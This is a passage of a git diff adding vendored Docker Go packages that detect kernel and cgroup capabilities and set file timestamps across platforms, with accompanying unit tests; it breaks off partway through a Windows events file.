Factor out platform specific capabilities. +type SysInfo struct { + // Whether the kernel supports AppArmor or not + AppArmor bool + // Whether the kernel supports Seccomp or not + Seccomp bool + + cgroupMemInfo + cgroupCPUInfo + cgroupBlkioInfo + cgroupCpusetInfo + cgroupPids + + // Whether IPv4 forwarding is supported or not, if this was disabled, networking will not work + IPv4ForwardingDisabled bool + + // Whether bridge-nf-call-iptables is supported or not + BridgeNFCallIPTablesDisabled bool + + // Whether bridge-nf-call-ip6tables is supported or not + BridgeNFCallIP6TablesDisabled bool + + // Whether the cgroup has the mountpoint of "devices" or not + CgroupDevicesEnabled bool +} + +type cgroupMemInfo struct { + // Whether memory limit is supported or not + MemoryLimit bool + + // Whether swap limit is supported or not + SwapLimit bool + + // Whether soft limit is supported or not + MemoryReservation bool + + // Whether OOM killer disable is supported or not + OomKillDisable bool + + // Whether memory swappiness is supported or not + MemorySwappiness bool + + // Whether kernel memory limit is supported or not + KernelMemory bool +} + +type cgroupCPUInfo struct { + // Whether CPU shares is supported or not + CPUShares bool + + // Whether CPU CFS(Completely Fair Scheduler) period is supported or not + CPUCfsPeriod bool + + // Whether CPU CFS(Completely Fair Scheduler) quota is supported or not + CPUCfsQuota bool + + // Whether CPU real-time period is supported or not + CPURealtimePeriod bool + + // Whether CPU real-time runtime is supported or not + CPURealtimeRuntime bool +} + +type cgroupBlkioInfo struct { + // Whether Block IO weight is supported or not + BlkioWeight bool + + // Whether Block IO weight_device is supported or not + BlkioWeightDevice bool + + // Whether Block IO read limit in bytes per second is supported or not + BlkioReadBpsDevice bool + + // Whether Block IO write limit in bytes per second is supported or not + BlkioWriteBpsDevice bool + + // Whether Block IO read limit in IO per second is supported or not + BlkioReadIOpsDevice bool + + // Whether Block IO write limit in IO per second is supported or not + BlkioWriteIOpsDevice bool +} + +type cgroupCpusetInfo struct { + // Whether Cpuset is supported or not + Cpuset bool + + // Available Cpuset's cpus + Cpus string + + // Available Cpuset's memory nodes + Mems string +} + +type cgroupPids struct { + // Whether Pids Limit is supported or not + PidsLimit bool +} + +// IsCpusetCpusAvailable returns `true` if the provided string set is contained +// in cgroup's cpuset.cpus set, `false` otherwise. +// If error is not nil a parsing error occurred. +func (c cgroupCpusetInfo) IsCpusetCpusAvailable(provided string) (bool, error) { + return isCpusetListAvailable(provided, c.Cpus) +} + +// IsCpusetMemsAvailable returns `true` if the provided string set is contained +// in cgroup's cpuset.mems set, `false` otherwise. +// If error is not nil a parsing error occurred. +func (c cgroupCpusetInfo) IsCpusetMemsAvailable(provided string) (bool, error) { + return isCpusetListAvailable(provided, c.Mems) +} + +func isCpusetListAvailable(provided, available string) (bool, error) { + parsedProvided, err := parsers.ParseUintList(provided) + if err != nil { + return false, err + } + parsedAvailable, err := parsers.ParseUintList(available) + if err != nil { + return false, err + } + for k := range parsedProvided { + if !parsedAvailable[k] { + return false, nil + } + } + return true, nil +} + +// Returns bit count of 1, used by NumCPU +func popcnt(x uint64) (n byte) { + x -= (x >> 1) & 0x5555555555555555 + x = (x>>2)&0x3333333333333333 + x&0x3333333333333333 + x += x >> 4 + x &= 0x0f0f0f0f0f0f0f0f + x *= 0x0101010101010101 + return byte(x >> 56) +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go new file mode 100644 index 0000000000..7ad84a8309 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go @@ -0,0 +1,259 @@ +package sysinfo + +import ( + "fmt" + "io/ioutil" + "os" + "path" + "strings" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/opencontainers/runc/libcontainer/cgroups" +) + +const ( + // SeccompModeFilter refers to the syscall argument SECCOMP_MODE_FILTER. + SeccompModeFilter = uintptr(2) +) + +func findCgroupMountpoints() (map[string]string, error) { + cgMounts, err := cgroups.GetCgroupMounts(false) + if err != nil { + return nil, fmt.Errorf("Failed to parse cgroup information: %v", err) + } + mps := make(map[string]string) + for _, m := range cgMounts { + for _, ss := range m.Subsystems { + mps[ss] = m.Mountpoint + } + } + return mps, nil +} + +// New returns a new SysInfo, using the filesystem to detect which features +// the kernel supports. If `quiet` is `false` warnings are printed in logs +// whenever an error occurs or misconfigurations are present. +func New(quiet bool) *SysInfo { + sysInfo := &SysInfo{} + cgMounts, err := findCgroupMountpoints() + if err != nil { + logrus.Warnf("Failed to parse cgroup information: %v", err) + } else { + sysInfo.cgroupMemInfo = checkCgroupMem(cgMounts, quiet) + sysInfo.cgroupCPUInfo = checkCgroupCPU(cgMounts, quiet) + sysInfo.cgroupBlkioInfo = checkCgroupBlkioInfo(cgMounts, quiet) + sysInfo.cgroupCpusetInfo = checkCgroupCpusetInfo(cgMounts, quiet) + sysInfo.cgroupPids = checkCgroupPids(quiet) + } + + _, ok := cgMounts["devices"] + sysInfo.CgroupDevicesEnabled = ok + + sysInfo.IPv4ForwardingDisabled = !readProcBool("/proc/sys/net/ipv4/ip_forward") + sysInfo.BridgeNFCallIPTablesDisabled = !readProcBool("/proc/sys/net/bridge/bridge-nf-call-iptables") + sysInfo.BridgeNFCallIP6TablesDisabled = !readProcBool("/proc/sys/net/bridge/bridge-nf-call-ip6tables") + + // Check if AppArmor is supported. + if _, err := os.Stat("/sys/kernel/security/apparmor"); !os.IsNotExist(err) { + sysInfo.AppArmor = true + } + + // Check if Seccomp is supported, via CONFIG_SECCOMP. + if _, _, err := syscall.RawSyscall(syscall.SYS_PRCTL, syscall.PR_GET_SECCOMP, 0, 0); err != syscall.EINVAL { + // Make sure the kernel has CONFIG_SECCOMP_FILTER. + if _, _, err := syscall.RawSyscall(syscall.SYS_PRCTL, syscall.PR_SET_SECCOMP, SeccompModeFilter, 0); err != syscall.EINVAL { + sysInfo.Seccomp = true + } + } + + return sysInfo +} + +// checkCgroupMem reads the memory information from the memory cgroup mount point. +func checkCgroupMem(cgMounts map[string]string, quiet bool) cgroupMemInfo { + mountPoint, ok := cgMounts["memory"] + if !ok { + if !quiet { + logrus.Warn("Your kernel does not support cgroup memory limit") + } + return cgroupMemInfo{} + } + + swapLimit := cgroupEnabled(mountPoint, "memory.memsw.limit_in_bytes") + if !quiet && !swapLimit { + logrus.Warn("Your kernel does not support swap memory limit") + } + memoryReservation := cgroupEnabled(mountPoint, "memory.soft_limit_in_bytes") + if !quiet && !memoryReservation { + logrus.Warn("Your kernel does not support memory reservation") + } + oomKillDisable := cgroupEnabled(mountPoint, "memory.oom_control") + if !quiet && !oomKillDisable { + logrus.Warn("Your kernel does not support oom control") + } + memorySwappiness := cgroupEnabled(mountPoint, "memory.swappiness") + if !quiet && !memorySwappiness { + logrus.Warn("Your kernel does not support memory swappiness") + } + kernelMemory := cgroupEnabled(mountPoint, "memory.kmem.limit_in_bytes") + if !quiet && !kernelMemory { + logrus.Warn("Your kernel does not support kernel memory limit") + } + + return cgroupMemInfo{ + MemoryLimit: true, + SwapLimit: swapLimit, + MemoryReservation: memoryReservation, + OomKillDisable: oomKillDisable, + MemorySwappiness: memorySwappiness, + KernelMemory: kernelMemory, + } +} + +// checkCgroupCPU reads the cpu information from the cpu cgroup mount point. +func checkCgroupCPU(cgMounts map[string]string, quiet bool) cgroupCPUInfo { + mountPoint, ok := cgMounts["cpu"] + if !ok { + if !quiet { + logrus.Warn("Unable to find cpu cgroup in mounts") + } + return cgroupCPUInfo{} + } + + cpuShares := cgroupEnabled(mountPoint, "cpu.shares") + if !quiet && !cpuShares { + logrus.Warn("Your kernel does not support cgroup cpu shares") + } + + cpuCfsPeriod := cgroupEnabled(mountPoint, "cpu.cfs_period_us") + if !quiet && !cpuCfsPeriod { + logrus.Warn("Your kernel does not support cgroup cfs period") + } + + cpuCfsQuota := cgroupEnabled(mountPoint, "cpu.cfs_quota_us") + if !quiet && !cpuCfsQuota { + logrus.Warn("Your kernel does not support cgroup cfs quotas") + } + + cpuRealtimePeriod := cgroupEnabled(mountPoint, "cpu.rt_period_us") + if !quiet && !cpuRealtimePeriod { + logrus.Warn("Your kernel does not support cgroup rt period") + } + + cpuRealtimeRuntime := cgroupEnabled(mountPoint, "cpu.rt_runtime_us") + if !quiet && !cpuRealtimeRuntime { + logrus.Warn("Your kernel does not support cgroup rt runtime") + } + + return cgroupCPUInfo{ + CPUShares: cpuShares, + CPUCfsPeriod: cpuCfsPeriod, + CPUCfsQuota: cpuCfsQuota, + CPURealtimePeriod: cpuRealtimePeriod, + CPURealtimeRuntime: cpuRealtimeRuntime, + } +} + +// checkCgroupBlkioInfo reads the blkio information from the blkio cgroup mount point. +func checkCgroupBlkioInfo(cgMounts map[string]string, quiet bool) cgroupBlkioInfo { + mountPoint, ok := cgMounts["blkio"] + if !ok { + if !quiet { + logrus.Warn("Unable to find blkio cgroup in mounts") + } + return cgroupBlkioInfo{} + } + + weight := cgroupEnabled(mountPoint, "blkio.weight") + if !quiet && !weight { + logrus.Warn("Your kernel does not support cgroup blkio weight") + } + + weightDevice := cgroupEnabled(mountPoint, "blkio.weight_device") + if !quiet && !weightDevice { + logrus.Warn("Your kernel does not support cgroup blkio weight_device") + } + + readBpsDevice := cgroupEnabled(mountPoint, "blkio.throttle.read_bps_device") + if !quiet && !readBpsDevice { + logrus.Warn("Your kernel does not support cgroup blkio throttle.read_bps_device") + } + + writeBpsDevice := cgroupEnabled(mountPoint, "blkio.throttle.write_bps_device") + if !quiet && !writeBpsDevice { + logrus.Warn("Your kernel does not support cgroup blkio throttle.write_bps_device") + } + readIOpsDevice := cgroupEnabled(mountPoint, "blkio.throttle.read_iops_device") + if !quiet && !readIOpsDevice { + logrus.Warn("Your kernel does not support cgroup blkio throttle.read_iops_device") + } + + writeIOpsDevice := cgroupEnabled(mountPoint, "blkio.throttle.write_iops_device") + if !quiet && !writeIOpsDevice { + logrus.Warn("Your kernel does not support cgroup blkio throttle.write_iops_device") + } + return cgroupBlkioInfo{ + BlkioWeight: weight, + BlkioWeightDevice: weightDevice, + BlkioReadBpsDevice: readBpsDevice, + BlkioWriteBpsDevice: writeBpsDevice, + BlkioReadIOpsDevice: readIOpsDevice, + BlkioWriteIOpsDevice: writeIOpsDevice, + } +} + +// checkCgroupCpusetInfo reads the cpuset information from the cpuset cgroup mount point. +func checkCgroupCpusetInfo(cgMounts map[string]string, quiet bool) cgroupCpusetInfo { + mountPoint, ok := cgMounts["cpuset"] + if !ok { + if !quiet { + logrus.Warn("Unable to find cpuset cgroup in mounts") + } + return cgroupCpusetInfo{} + } + + cpus, err := ioutil.ReadFile(path.Join(mountPoint, "cpuset.cpus")) + if err != nil { + return cgroupCpusetInfo{} + } + + mems, err := ioutil.ReadFile(path.Join(mountPoint, "cpuset.mems")) + if err != nil { + return cgroupCpusetInfo{} + } + + return cgroupCpusetInfo{ + Cpuset: true, + Cpus: strings.TrimSpace(string(cpus)), + Mems: strings.TrimSpace(string(mems)), + } +} + +// checkCgroupPids reads the pids information from the pids cgroup mount point. +func checkCgroupPids(quiet bool) cgroupPids { + _, err := cgroups.FindCgroupMountpoint("pids") + if err != nil { + if !quiet { + logrus.Warn(err) + } + return cgroupPids{} + } + + return cgroupPids{ + PidsLimit: true, + } +} + +func cgroupEnabled(mountPoint, name string) bool { + _, err := os.Stat(path.Join(mountPoint, name)) + return err == nil +} + +func readProcBool(path string) bool { + val, err := ioutil.ReadFile(path) + if err != nil { + return false + } + return strings.TrimSpace(string(val)) == "1" +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go new file mode 100644 index 0000000000..fae0fdffbb --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go @@ -0,0 +1,58 @@ +package sysinfo + +import ( + "io/ioutil" + "os" + "path" + "path/filepath" + "testing" +) + +func TestReadProcBool(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "test-sysinfo-proc") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpDir) + + procFile := filepath.Join(tmpDir, "read-proc-bool") + if err := ioutil.WriteFile(procFile, []byte("1"), 644); err != nil { + t.Fatal(err) + } + + if !readProcBool(procFile) { + t.Fatal("expected proc bool to be true, got false") + } + + if err := ioutil.WriteFile(procFile, []byte("0"), 644); err != nil { + t.Fatal(err) + } + if readProcBool(procFile) { + t.Fatal("expected proc bool to be false, got false") + } + + if readProcBool(path.Join(tmpDir, "no-exist")) { + t.Fatal("should be false for non-existent entry") + } + +} + +func TestCgroupEnabled(t *testing.T) { + cgroupDir, err := ioutil.TempDir("", "cgroup-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(cgroupDir) + + if cgroupEnabled(cgroupDir, "test") { + t.Fatal("cgroupEnabled should be false") + } + + if err := ioutil.WriteFile(path.Join(cgroupDir, "test"), []byte{}, 644); err != nil { + t.Fatal(err) + } + + if !cgroupEnabled(cgroupDir, "test") { + t.Fatal("cgroupEnabled should be true") + } +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go new file mode 100644 index 0000000000..c858d57e08 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go @@ -0,0 +1,121 @@ +// +build solaris,cgo + +package sysinfo + +import ( + "bytes" + "os/exec" + "strconv" + "strings" +) + +/* +#cgo LDFLAGS: -llgrp +#include +#include +#include +int getLgrpCount() { + lgrp_cookie_t lgrpcookie = LGRP_COOKIE_NONE; + uint_t nlgrps; + + if ((lgrpcookie = lgrp_init(LGRP_VIEW_OS)) == LGRP_COOKIE_NONE) { + return -1; + } + nlgrps = lgrp_nlgrps(lgrpcookie); + return nlgrps; +} +*/ +import "C" + +// IsCPUSharesAvailable returns whether CPUShares setting is supported. +// We need FSS to be set as default scheduling class to support CPU Shares +func IsCPUSharesAvailable() bool { + cmd := exec.Command("/usr/sbin/dispadmin", "-d") + outBuf := new(bytes.Buffer) + errBuf := new(bytes.Buffer) + cmd.Stderr = errBuf + cmd.Stdout = outBuf + + if err := cmd.Run(); err != nil { + return false + } + return (strings.Contains(outBuf.String(), "FSS")) +} + +// New returns a new SysInfo, using the filesystem to detect which features +// the kernel supports. +//NOTE Solaris: If we change the below capabilities be sure +// to update verifyPlatformContainerSettings() in daemon_solaris.go +func New(quiet bool) *SysInfo { + sysInfo := &SysInfo{} + sysInfo.cgroupMemInfo = setCgroupMem(quiet) + sysInfo.cgroupCPUInfo = setCgroupCPU(quiet) + sysInfo.cgroupBlkioInfo = setCgroupBlkioInfo(quiet) + sysInfo.cgroupCpusetInfo = setCgroupCPUsetInfo(quiet) + + sysInfo.IPv4ForwardingDisabled = false + + sysInfo.AppArmor = false + + return sysInfo +} + +// setCgroupMem reads the memory information for Solaris. +func setCgroupMem(quiet bool) cgroupMemInfo { + + return cgroupMemInfo{ + MemoryLimit: true, + SwapLimit: true, + MemoryReservation: false, + OomKillDisable: false, + MemorySwappiness: false, + KernelMemory: false, + } +} + +// setCgroupCPU reads the cpu information for Solaris. +func setCgroupCPU(quiet bool) cgroupCPUInfo { + + return cgroupCPUInfo{ + CPUShares: true, + CPUCfsPeriod: false, + CPUCfsQuota: true, + CPURealtimePeriod: false, + CPURealtimeRuntime: false, + } +} + +// blkio switches are not supported in Solaris. +func setCgroupBlkioInfo(quiet bool) cgroupBlkioInfo { + + return cgroupBlkioInfo{ + BlkioWeight: false, + BlkioWeightDevice: false, + } +} + +// setCgroupCPUsetInfo reads the cpuset information for Solaris. +func setCgroupCPUsetInfo(quiet bool) cgroupCpusetInfo { + + return cgroupCpusetInfo{ + Cpuset: true, + Cpus: getCPUCount(), + Mems: getLgrpCount(), + } +} + +func getCPUCount() string { + ncpus := C.sysconf(C._SC_NPROCESSORS_ONLN) + if ncpus <= 0 { + return "" + } + return strconv.FormatInt(int64(ncpus), 16) +} + +func getLgrpCount() string { + nlgrps := C.getLgrpCount() + if nlgrps <= 0 { + return "" + } + return strconv.FormatInt(int64(nlgrps), 16) +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go new file mode 100644 index 0000000000..b61fbcf541 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go @@ -0,0 +1,26 @@ +package sysinfo + +import "testing" + +func TestIsCpusetListAvailable(t *testing.T) { + cases := []struct { + provided string + available string + res bool + err bool + }{ + {"1", "0-4", true, false}, + {"01,3", "0-4", true, false}, + {"", "0-7", true, false}, + {"1--42", "0-7", false, true}, + {"1-42", "00-1,8,,9", false, true}, + {"1,41-42", "43,45", false, false}, + {"0-3", "", false, false}, + } + for _, c := range cases { + r, err := isCpusetListAvailable(c.provided, c.available) + if (c.err && err == nil) && r != c.res { + t.Fatalf("Expected pair: %v, %v for %s, %s. Got %v, %v instead", c.res, c.err, c.provided, c.available, (c.err && err == nil), r) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go new file mode 100644 index 0000000000..45f3ef1c65 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go @@ -0,0 +1,9 @@ +// +build !linux,!solaris,!windows + +package sysinfo + +// New returns an empty SysInfo for non linux nor solaris for now. +func New(quiet bool) *SysInfo { + sysInfo := &SysInfo{} + return sysInfo +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go new file mode 100644 index 0000000000..4e6255bc59 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go @@ -0,0 +1,9 @@ +// +build windows + +package sysinfo + +// New returns an empty SysInfo for windows for now. +func New(quiet bool) *SysInfo { + sysInfo := &SysInfo{} + return sysInfo +} diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes.go b/vendor/github.com/docker/docker/pkg/system/chtimes.go new file mode 100644 index 0000000000..7637f12e1a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/chtimes.go @@ -0,0 +1,52 @@ +package system + +import ( + "os" + "syscall" + "time" + "unsafe" +) + +var ( + maxTime time.Time +) + +func init() { + if unsafe.Sizeof(syscall.Timespec{}.Nsec) == 8 { + // This is a 64 bit timespec + // os.Chtimes limits time to the following + maxTime = time.Unix(0, 1<<63-1) + } else { + // This is a 32 bit timespec + maxTime = time.Unix(1<<31-1, 0) + } +} + +// Chtimes changes the access time and modified time of a file at the given path +func Chtimes(name string, atime time.Time, mtime time.Time) error { + unixMinTime := time.Unix(0, 0) + unixMaxTime := maxTime + + // If the modified time is prior to the Unix Epoch, or after the + // end of Unix Time, os.Chtimes has undefined behavior + // default to Unix Epoch in this case, just in case + + if atime.Before(unixMinTime) || atime.After(unixMaxTime) { + atime = unixMinTime + } + + if mtime.Before(unixMinTime) || mtime.After(unixMaxTime) { + mtime = unixMinTime + } + + if err := os.Chtimes(name, atime, mtime); err != nil { + return err + } + + // Take platform specific action for setting create time. + if err := setCTime(name, mtime); err != nil { + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_test.go new file mode 100644 index 0000000000..5c87df32a2 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_test.go @@ -0,0 +1,94 @@ +package system + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + "time" +) + +// prepareTempFile creates a temporary file in a temporary directory. +func prepareTempFile(t *testing.T) (string, string) { + dir, err := ioutil.TempDir("", "docker-system-test") + if err != nil { + t.Fatal(err) + } + + file := filepath.Join(dir, "exist") + if err := ioutil.WriteFile(file, []byte("hello"), 0644); err != nil { + t.Fatal(err) + } + return file, dir +} + +// TestChtimes tests Chtimes on a tempfile. Test only mTime, because aTime is OS dependent +func TestChtimes(t *testing.T) { + file, dir := prepareTempFile(t) + defer os.RemoveAll(dir) + + beforeUnixEpochTime := time.Unix(0, 0).Add(-100 * time.Second) + unixEpochTime := time.Unix(0, 0) + afterUnixEpochTime := time.Unix(100, 0) + unixMaxTime := maxTime + + // Test both aTime and mTime set to Unix Epoch + Chtimes(file, unixEpochTime, unixEpochTime) + + f, err := os.Stat(file) + if err != nil { + t.Fatal(err) + } + + if f.ModTime() != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, f.ModTime()) + } + + // Test aTime before Unix Epoch and mTime set to Unix Epoch + Chtimes(file, beforeUnixEpochTime, unixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + if f.ModTime() != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, f.ModTime()) + } + + // Test aTime set to Unix Epoch and mTime before Unix Epoch + Chtimes(file, unixEpochTime, beforeUnixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + if f.ModTime() != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, f.ModTime()) + } + + // Test both aTime and mTime set to after Unix Epoch (valid time) + Chtimes(file, afterUnixEpochTime, afterUnixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + if f.ModTime() != afterUnixEpochTime { + t.Fatalf("Expected: %s, got: %s", afterUnixEpochTime, f.ModTime()) + } + + // Test both aTime and mTime set to Unix max time + Chtimes(file, unixMaxTime, unixMaxTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + if f.ModTime().Truncate(time.Second) != unixMaxTime.Truncate(time.Second) { + t.Fatalf("Expected: %s, got: %s", unixMaxTime.Truncate(time.Second), f.ModTime().Truncate(time.Second)) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go b/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go new file mode 100644 index 0000000000..09d58bcbfd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go @@ -0,0 +1,14 @@ +// +build !windows + +package system + +import ( + "time" +) + +//setCTime will set the create time on a file. On Unix, the create +//time is updated as a side effect of setting the modified time, so +//no action is required. +func setCTime(path string, ctime time.Time) error { + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go new file mode 100644 index 0000000000..6ec9a7173c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go @@ -0,0 +1,91 @@ +// +build !windows + +package system + +import ( + "os" + "syscall" + "testing" + "time" +) + +// TestChtimesLinux tests Chtimes access time on a tempfile on Linux +func TestChtimesLinux(t *testing.T) { + file, dir := prepareTempFile(t) + defer os.RemoveAll(dir) + + beforeUnixEpochTime := time.Unix(0, 0).Add(-100 * time.Second) + unixEpochTime := time.Unix(0, 0) + afterUnixEpochTime := time.Unix(100, 0) + unixMaxTime := maxTime + + // Test both aTime and mTime set to Unix Epoch + Chtimes(file, unixEpochTime, unixEpochTime) + + f, err := os.Stat(file) + if err != nil { + t.Fatal(err) + } + + stat := f.Sys().(*syscall.Stat_t) + aTime := time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) + if aTime != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime) + } + + // Test aTime before Unix Epoch and mTime set to Unix Epoch + Chtimes(file, beforeUnixEpochTime, unixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + stat = f.Sys().(*syscall.Stat_t) + aTime = time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) + if aTime != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime) + } + + // Test aTime set to Unix Epoch and mTime before Unix Epoch + Chtimes(file, unixEpochTime, beforeUnixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + stat = f.Sys().(*syscall.Stat_t) + aTime = time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) + if aTime != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime) + } + + // Test both aTime and mTime set to after Unix Epoch (valid time) + Chtimes(file, afterUnixEpochTime, afterUnixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + stat = f.Sys().(*syscall.Stat_t) + aTime = time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) + if aTime != afterUnixEpochTime { + t.Fatalf("Expected: %s, got: %s", afterUnixEpochTime, aTime) + } + + // Test both aTime and mTime set to Unix max time + Chtimes(file, unixMaxTime, unixMaxTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + stat = f.Sys().(*syscall.Stat_t) + aTime = time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) + if aTime.Truncate(time.Second) != unixMaxTime.Truncate(time.Second) { + t.Fatalf("Expected: %s, got: %s", unixMaxTime.Truncate(time.Second), aTime.Truncate(time.Second)) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go b/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go new file mode 100644 index 0000000000..2945868465 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go @@ -0,0 +1,27 @@ +// +build windows + +package system + +import ( + "syscall" + "time" +) + +//setCTime will set the create time on a file. On Windows, this requires +//calling SetFileTime and explicitly including the create time. +func setCTime(path string, ctime time.Time) error { + ctimespec := syscall.NsecToTimespec(ctime.UnixNano()) + pathp, e := syscall.UTF16PtrFromString(path) + if e != nil { + return e + } + h, e := syscall.CreateFile(pathp, + syscall.FILE_WRITE_ATTRIBUTES, syscall.FILE_SHARE_WRITE, nil, + syscall.OPEN_EXISTING, syscall.FILE_FLAG_BACKUP_SEMANTICS, 0) + if e != nil { + return e + } + defer syscall.Close(h) + c := syscall.NsecToFiletime(syscall.TimespecToNsec(ctimespec)) + return syscall.SetFileTime(h, &c, nil, nil) +} diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go new file mode 100644 index 0000000000..72d8a10619 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go @@ -0,0 +1,86 @@ +// +build windows + +package system + +import ( + "os" + "syscall" + "testing" + "time" +) + +// TestChtimesWindows tests Chtimes access time on a tempfile on Windows +func TestChtimesWindows(t *testing.T) { + file, dir := prepareTempFile(t) + defer os.RemoveAll(dir) + + beforeUnixEpochTime := time.Unix(0, 0).Add(-100 * time.Second) + unixEpochTime := time.Unix(0, 0) + afterUnixEpochTime := time.Unix(100, 0) + unixMaxTime := maxTime + + // Test both aTime and mTime set to Unix Epoch + Chtimes(file, unixEpochTime, unixEpochTime) + + f, err := os.Stat(file) + if err != nil { + t.Fatal(err) + } + + aTime := time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds()) + if aTime != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime) + } + + // Test aTime before Unix Epoch and mTime set to Unix Epoch + Chtimes(file, beforeUnixEpochTime, unixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + aTime = time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds()) + if aTime != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime) + } + + // Test aTime set to Unix Epoch and mTime before Unix Epoch + Chtimes(file, unixEpochTime, beforeUnixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + aTime = time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds()) + if aTime != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime) + } + + // Test both aTime and mTime set to after Unix Epoch (valid time) + Chtimes(file, afterUnixEpochTime, afterUnixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + aTime = time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds()) + if aTime != afterUnixEpochTime { + t.Fatalf("Expected: %s, got: %s", afterUnixEpochTime, aTime) + } + + // Test both aTime and mTime set to Unix max time + Chtimes(file, unixMaxTime, unixMaxTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + aTime = time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds()) + if aTime.Truncate(time.Second) != unixMaxTime.Truncate(time.Second) { + t.Fatalf("Expected: %s, got: %s", unixMaxTime.Truncate(time.Second), aTime.Truncate(time.Second)) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/errors.go b/vendor/github.com/docker/docker/pkg/system/errors.go new file mode 100644 index 0000000000..288318985e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/errors.go @@ -0,0 +1,10 @@ +package system + +import ( + "errors" +) + +var ( + // ErrNotSupportedPlatform means the platform is not supported. + ErrNotSupportedPlatform = errors.New("platform and architecture is not supported") +) diff --git a/vendor/github.com/docker/docker/pkg/system/events_windows.go b/vendor/github.com/docker/docker/pkg/system/events_windows.go new file mode 100644 index 0000000000..3ec6d22151 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/events_windows.go @@ -0,0 +1,85 @@ +package system + +// This file implements syscalls for Win32 events which are not implemented +// in golang. + +import ( + "syscall" + "unsafe" + + "golang.org/x/sys/windows" +) + +var ( + procCreateEvent = modkernel32.NewProc("CreateEventW") + procOpenEvent = modkernel32.NewProc("OpenEventW") + procSetEvent = 